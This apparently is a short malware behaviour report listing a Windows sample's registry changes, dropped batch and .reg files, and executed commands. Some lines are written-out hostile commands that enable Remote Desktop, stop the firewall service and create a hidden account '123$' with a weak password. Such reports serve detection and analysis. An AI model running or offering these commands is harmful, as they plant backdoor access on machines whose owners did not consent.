Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'N?A??u?A.exe' = '<SYSTEM32>\ophcrack.bat'
- '<SYSTEM32>\UUSee.exe'
- '%WINDIR%\regedit.exe' /s x.reg
- '<SYSTEM32>\sc.exe' config TermService start= demand
- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s 123$ /add
- '%WINDIR%\regedit.exe' /s system.reg
- '<SYSTEM32>\sc.exe' start TermService
- '<SYSTEM32>\net.exe' stop sharedaccess
- '<SYSTEM32>\wscript.exe' "<SYSTEM32>\run.vbs"
- '<SYSTEM32>\net1.exe' stop sharedaccess
- '%WINDIR%\regedit.exe' /s c:\shit.reg
- '<SYSTEM32>\net1.exe' user 123$ 123 /add
- <SYSTEM32>\迅雷更新.exe
- <SYSTEM32>\UUSee.exe
- C:\shit.reg
- <SYSTEM32>\system.reg
- <SYSTEM32>\x.reg
- <SYSTEM32>\run.vbs
- <SYSTEM32>\ophcrack.bat
- <SYSTEM32>\3389.bat
- <SYSTEM32>\Snagit.bat
- <SYSTEM32>\UUSee.bat
- <SYSTEM32>\user.bat
- <SYSTEM32>\run.vbs
- <SYSTEM32>\user.bat
- <SYSTEM32>\x.reg
- C:\shit.reg
- ClassName: 'RegEdit_RegEdit' WindowName: ''
- ClassName: 'Indicator' WindowName: ''
- ClassName: 'EDIT' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''